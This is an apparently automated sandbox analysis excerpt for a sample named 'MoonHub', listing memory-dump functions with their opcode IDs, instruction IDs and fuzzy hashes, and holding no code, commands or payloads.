                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e6a820849a0084b1f2dba3e85d5af97ba2f299ee750670357e38dced0217508b
                                                                                                                                                                                • Instruction ID: 3fba5c4b741245faf8bacc5395d069804ddd9cd86dc69dc31836b5fa6d23c6b0
                                                                                                                                                                                • Opcode Fuzzy Hash: e6a820849a0084b1f2dba3e85d5af97ba2f299ee750670357e38dced0217508b
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B01A931A2885A8FDB48FBA8C851AEDB7B1FF58344F4440B5D40AE31A3CF686945C755
                                                                                                                                                                                Function 00007FF848E97CC0 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f3eac20122740126407250e121602a36774cb23aee0d1e3bd49626ceb2609034
                                                                                                                                                                                • Instruction ID: b4920d59c3ab777eecb537a6dd71fa33d5ac13587d792fa9a915abb78fa32270
                                                                                                                                                                                • Opcode Fuzzy Hash: f3eac20122740126407250e121602a36774cb23aee0d1e3bd49626ceb2609034
                                                                                                                                                                                • Instruction Fuzzy Hash: C1F0AF31E0891D9EDB90BBA894462FD7BE0EF48384F004176E408E3289DE3419054BC1
                                                                                                                                                                                Function 00007FF848E91800 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 34dc28033da533fce296db90a424b78d78bade455e2fb4e967b62d1f349442ff
                                                                                                                                                                                • Instruction ID: e7657decd95ace87c39f1e7f5a9e2d09eafe746e1c21bed512dee2cc6e5730b7
                                                                                                                                                                                • Opcode Fuzzy Hash: 34dc28033da533fce296db90a424b78d78bade455e2fb4e967b62d1f349442ff
                                                                                                                                                                                • Instruction Fuzzy Hash: 3FF0A43161CB4D4FC798E708E4546AAB7E1FBD8394F80053EF04AD3394CE7598408786
                                                                                                                                                                                Function 00007FF848EACBB0 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6d7416961f5c01b9cd163932a7ebf541feb20420fec9a9118ca43193ae369841
                                                                                                                                                                                • Instruction ID: 06b5848bd053df14f2ccd88a694d78797ee345232ad05cf107ac7db56ec2cf55
                                                                                                                                                                                • Opcode Fuzzy Hash: 6d7416961f5c01b9cd163932a7ebf541feb20420fec9a9118ca43193ae369841
                                                                                                                                                                                • Instruction Fuzzy Hash: F8F03C34E1CE1A8FEAA9A6388445B72B2E1FB5A350F244578D05FC3584EF39E8868745
                                                                                                                                                                                Function 00007FF848EE22A8 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5d4445aeca887ccebbc9e889ef231fb51a5b1389b29f0a4a8db57d2c9576cef4
                                                                                                                                                                                • Instruction ID: 8dbb3128407f4c1da2c0b1adc65877ef80aa8c3574175d0d5bb0d94f3226c17d
                                                                                                                                                                                • Opcode Fuzzy Hash: 5d4445aeca887ccebbc9e889ef231fb51a5b1389b29f0a4a8db57d2c9576cef4
                                                                                                                                                                                • Instruction Fuzzy Hash: 58F0EC6071CD0E8FEA94FA2DC45193573D0FB28348B6445A8D40DCB592EB29E8468714
                                                                                                                                                                                Function 00007FF848EA15A0 Relevance: .0, Instructions: 42COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 34e7b139b3a91165c036247c023191a20116ddfb28ce7c29714b7fbec754ae14
                                                                                                                                                                                • Instruction ID: e540d726ef73d6884d759f0aa8328a786357fa3a964852aaa4c55f09ce31c346
                                                                                                                                                                                • Opcode Fuzzy Hash: 34e7b139b3a91165c036247c023191a20116ddfb28ce7c29714b7fbec754ae14
                                                                                                                                                                                • Instruction Fuzzy Hash: 0AF0FC3092CB094FE750FB38940467AB6E0FF98345F040A3AA88DD21A0EF38D5804785
                                                                                                                                                                                Function 00007FF848EABAA3 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f5bdc52f301aaf2a5231920df62697cd294f930cc81b0d136ee1cccc69143eed
                                                                                                                                                                                • Instruction ID: a18391090aa88e3a8aaf90c2f600061f9c1a50be57d3bf4e1865de288d028d15
                                                                                                                                                                                • Opcode Fuzzy Hash: f5bdc52f301aaf2a5231920df62697cd294f930cc81b0d136ee1cccc69143eed
                                                                                                                                                                                • Instruction Fuzzy Hash: BEE02B22B1D8161FB258B19D24C55F90785FFEC271F080177E41CC2182CE685883435C
                                                                                                                                                                                Function 00007FF848E973A0 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 67006302b1450b69ad6ae54e8821a4e4772c459dc7f03109616f4ae413c88b67
                                                                                                                                                                                • Instruction ID: b10108c9ec08d0c84efdf3dce8131dab70cd76aef8f246eb9ac2569f7133487f
                                                                                                                                                                                • Opcode Fuzzy Hash: 67006302b1450b69ad6ae54e8821a4e4772c459dc7f03109616f4ae413c88b67
                                                                                                                                                                                • Instruction Fuzzy Hash: D1F0827180EBD86FE35AEB364C5E4A63F74EE53254B09109BF088CB0A3E6645808C361
                                                                                                                                                                                Function 00007FF848EACEE7 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a99dc3a3344534d12e2d8d9575cc188ed1bacee1fbf09c19fef39bd08d201bc0
                                                                                                                                                                                • Instruction ID: f3662492b2e02bbe18ba715eafe4414908c9cd992de83dd09a6977e9b4c1f6ce
                                                                                                                                                                                • Opcode Fuzzy Hash: a99dc3a3344534d12e2d8d9575cc188ed1bacee1fbf09c19fef39bd08d201bc0
                                                                                                                                                                                • Instruction Fuzzy Hash: FEF08967E1CAD15FD7B5553C54650B52BD1FFDA9A071401FBC08A87196EE1818064245
                                                                                                                                                                                Function 00007FF848EAB1D8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b44cd39818f04e619791f773b127726b32a9dab81aaecfd4790ff1e64e29ace8
                                                                                                                                                                                • Instruction ID: 95d6cceb580f86f20e35931f824c02beb0c7fdc100d01e2f0cefa0ac78a5b6bc
                                                                                                                                                                                • Opcode Fuzzy Hash: b44cd39818f04e619791f773b127726b32a9dab81aaecfd4790ff1e64e29ace8
                                                                                                                                                                                • Instruction Fuzzy Hash: DFF0E201C9CE660EF7B6717A31483BA29C1BB14364F4824BAD89DC49C1EA5CFCC583AD
                                                                                                                                                                                Function 00007FF848ED9AD8 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cbc193fd4d52a90eb9f61d3bb50143d020919b434574490080ac0734bf327db4
                                                                                                                                                                                • Instruction ID: e5e26c118fd2858c13dd80129af8e3a7523403bf24858c06a0b980e97f883f40
                                                                                                                                                                                • Opcode Fuzzy Hash: cbc193fd4d52a90eb9f61d3bb50143d020919b434574490080ac0734bf327db4
                                                                                                                                                                                • Instruction Fuzzy Hash: 06E09B31D0D8175ED6A8763864891F812D1FF85390F940576D44DC61D6CF296C898699
                                                                                                                                                                                Function 00007FF848E97B05 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e5b2d3d50e59f933a9fa7de3ddd1b468536fe3a99278d187a9876ad99df22c07
                                                                                                                                                                                • Instruction ID: 77d25375b07637f6965b276367ac7fc1e63d34a2bebcef177142aad29e47f8e2
                                                                                                                                                                                • Opcode Fuzzy Hash: e5b2d3d50e59f933a9fa7de3ddd1b468536fe3a99278d187a9876ad99df22c07
                                                                                                                                                                                • Instruction Fuzzy Hash: E2F0152294DBCC4EDB63BBB418211E83F71AE02249F4A00E3D588DB0A3E7281909C366
                                                                                                                                                                                Function 00007FF848E91A80 Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 12d2e3c7c47e775806c4be3e14d5848d5c55912e3e3ce03bf9e20325ec0c5a81
                                                                                                                                                                                • Instruction ID: 0e2b5842efc4bbcdd0cf3cfe3cd07c2eec3b0edfbf8d3e24cfe67d39306e1f97
                                                                                                                                                                                • Opcode Fuzzy Hash: 12d2e3c7c47e775806c4be3e14d5848d5c55912e3e3ce03bf9e20325ec0c5a81
                                                                                                                                                                                • Instruction Fuzzy Hash: 3BE06831D4CB4C4FDB50BA68B8009D83BA0FB843A8F0400A9E00DC3280C7799C54C342
                                                                                                                                                                                Function 00007FF848ED8670 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5ade2eaf17faefb78e68fe1d7c06f3f20d924a58d1d07b4216a82b618da6823a
                                                                                                                                                                                • Instruction ID: 797eced0c940fd0def5ea4ed8c79477b9ffc4c2e5b48ab0b4bbf19921309a431
                                                                                                                                                                                • Opcode Fuzzy Hash: 5ade2eaf17faefb78e68fe1d7c06f3f20d924a58d1d07b4216a82b618da6823a
                                                                                                                                                                                • Instruction Fuzzy Hash: 15E08C12E1CD2B0EF9B4B16934151B821C1EF183A0F0410B3EC3CC66A5EE2D6DDA4ACE
                                                                                                                                                                                Function 00007FF848E9F448 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 232a0c9af3e6c4108d332fbc74bac483bd67900016466e2675aba2910e6917f7
                                                                                                                                                                                • Instruction ID: 96cf5151847ddfd69940d7a53794af452d9052d5091223b290a871d935f4ca38
                                                                                                                                                                                • Opcode Fuzzy Hash: 232a0c9af3e6c4108d332fbc74bac483bd67900016466e2675aba2910e6917f7
                                                                                                                                                                                • Instruction Fuzzy Hash: BDE0DF76E0A40ADFD741E7ACE4205EDBBB1FF86279B0401FAC409D3062FA7429428B94
                                                                                                                                                                                Function 00007FF848E909AD Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 50b69d88db25e148922b5e9297fb82f269ddeb1d18ec60702a13a07584a0e1a3
                                                                                                                                                                                • Instruction ID: e6ca292f856c0d95f2d47ac4a7388b774a0b28af4eff40df03b088c5c6c311da
                                                                                                                                                                                • Opcode Fuzzy Hash: 50b69d88db25e148922b5e9297fb82f269ddeb1d18ec60702a13a07584a0e1a3
                                                                                                                                                                                • Instruction Fuzzy Hash: 5DE0C221F5A81A1DFA48B3B468171FDB295EFC4248FC15872E00DC2083CE2939010195
                                                                                                                                                                                Function 00007FF848E90CFD Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e8e45df4e5d7aae835c4c5b86974fb2f115185d10466594cf96fd2a148cd861
                                                                                                                                                                                • Instruction ID: 1ad610bb739d8f65996c2de35f74aabc88b01bf816f45a8d6f456c807cf41020
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e8e45df4e5d7aae835c4c5b86974fb2f115185d10466594cf96fd2a148cd861
                                                                                                                                                                                • Instruction Fuzzy Hash: 49E0C221FAA80E1DEB48B3B468165FDB265EF88288FC01832E40DC2083CE6935010195
                                                                                                                                                                                Function 00007FF848EA48C8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                                                                                                                                                                                • Instruction ID: 26b080e2b7576d604a52c6dc673e0fda26879fc4e28010d81d5609214e63162a
                                                                                                                                                                                • Opcode Fuzzy Hash: 76793d08e2dcad83b3ea887de2be0cf5b97587114a45d8466a536ba86e10db6d
                                                                                                                                                                                • Instruction Fuzzy Hash: 7DD06773A5C71A6DF558B64874031FC7381FF866B9FA1103BD68F91883AE2A3522118E
                                                                                                                                                                                Function 00007FF848E9E03D Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 216d37114c49fdead4f515d679c64c7c31293e85c53705b10772a9cbf6e523b7
                                                                                                                                                                                • Instruction ID: 616ad5bb1b8e559f25f7005808b3401d1cf2d99569abe2edfd86bc24f8499f70
                                                                                                                                                                                • Opcode Fuzzy Hash: 216d37114c49fdead4f515d679c64c7c31293e85c53705b10772a9cbf6e523b7
                                                                                                                                                                                • Instruction Fuzzy Hash: 4BE0C221F6A81A1DEA08B3B868161FEB295EF89244FC11872E10DC2083CF6939010195
                                                                                                                                                                                Function 00007FF848EA621D Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 0de5f4a916c8713315d2cb0844410cc85951b5d4bf48f4f0c1cfac57c369873d
                                                                                                                                                                                • Instruction ID: 546fd980063b3b5af549383e4ec5eee51a2d00220bf6c28de444b55d964cbaa0
                                                                                                                                                                                • Opcode Fuzzy Hash: 0de5f4a916c8713315d2cb0844410cc85951b5d4bf48f4f0c1cfac57c369873d
                                                                                                                                                                                • Instruction Fuzzy Hash: 59D02E21F49C0D4DEB08B3B8681A1FEB286FFC8240FC10032E10DC2083DE2A280102A1
                                                                                                                                                                                Function 00007FF848E9F65D Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e59f09deb1c45643121723149c38f291a5a25dbc81f1dd9692e3d00cf30ae732
                                                                                                                                                                                • Instruction ID: c346cc72a4d9ad9eb1f43e9c58ea4a88d219124813e8434d606a306ced8a432c
                                                                                                                                                                                • Opcode Fuzzy Hash: e59f09deb1c45643121723149c38f291a5a25dbc81f1dd9692e3d00cf30ae732
                                                                                                                                                                                • Instruction Fuzzy Hash: F2D02E21F4880E1DFB08B3B8A81A1FEB295FFC8288FC11076E90DC3083CE6A28110291
                                                                                                                                                                                Function 00007FF848E9E62A Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                                                                                                                                                                • Instruction ID: 8f288b5026a84c27ae37c8982a601c1ff77aea834efab42fe13fe96b36a591d9
                                                                                                                                                                                • Opcode Fuzzy Hash: 01e9cb3e2d135eb0db6dc780765f20e68e8c223b1d2f45c610b960c49168d00f
                                                                                                                                                                                • Instruction Fuzzy Hash: C2D06722E5C9174DE69872C874032FE7280FB852B8F50517BD35F814829EEA7416118A
                                                                                                                                                                                Function 00007FF848EA9890 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 3a74a35d346e4100ac134de87cb3f1e90096f0c9ed2d902f7ea4814b594900b3
                                                                                                                                                                                • Instruction ID: 564f23dfa9c6ef2ab6dbad2d69695242f6d4f2d1f0ef146d69d2a8582c55745f
                                                                                                                                                                                • Opcode Fuzzy Hash: 3a74a35d346e4100ac134de87cb3f1e90096f0c9ed2d902f7ea4814b594900b3
                                                                                                                                                                                • Instruction Fuzzy Hash: 9AE08C30A08A044F8748EA2C948C92B7FE4DBEC365F180B3FB40DD3270DA308640878A
                                                                                                                                                                                Function 00007FF848EC7CF0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 2a9d948131ae13719e6e64efd29e215cb6a9e13c4be2f70720f2301f3ad0b081
                                                                                                                                                                                • Instruction ID: 94a8ef1e2b86271ecdc07fb857cdab0acf80b81b64d694bf1a1689ad19156436
                                                                                                                                                                                • Opcode Fuzzy Hash: 2a9d948131ae13719e6e64efd29e215cb6a9e13c4be2f70720f2301f3ad0b081
                                                                                                                                                                                • Instruction Fuzzy Hash: 5CD01220D2CE194FDAB8FA7860456B561E1FB19310F400E69D01AC3589DF78B9894385
                                                                                                                                                                                Function 00007FF848E908FE Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: eb8507c38fe74c92c08dafe6a34a891a7fdebea0aa248f7155e395a9cc41da71
                                                                                                                                                                                • Instruction ID: 7587889945a9da8f9399dba236145b9ed272c3e088e44084659d7cd8fbef160e
                                                                                                                                                                                • Opcode Fuzzy Hash: eb8507c38fe74c92c08dafe6a34a891a7fdebea0aa248f7155e395a9cc41da71
                                                                                                                                                                                • Instruction Fuzzy Hash: 27D05B7245C7094FC305EB54E4104DAB7A0FF883B4F400B3EE09E911E5DF7893858681
                                                                                                                                                                                Function 00007FF848E90C57 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: afc4065e3c24badeb93c5d0bf84bf0f5e6b6f01575509e494b8ea2393ea39f18
                                                                                                                                                                                • Instruction ID: 471ba0b923635a7f431839580d12395d284ad6da41375e85053ef32fac241d5c
                                                                                                                                                                                • Opcode Fuzzy Hash: afc4065e3c24badeb93c5d0bf84bf0f5e6b6f01575509e494b8ea2393ea39f18
                                                                                                                                                                                • Instruction Fuzzy Hash: B9D05E3142CB094BD345EF14E4408EAB7A0FF84770F800B2EF06E862E6DF7492858686
                                                                                                                                                                                Function 00007FF848EAC788 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                Download Yara Rule
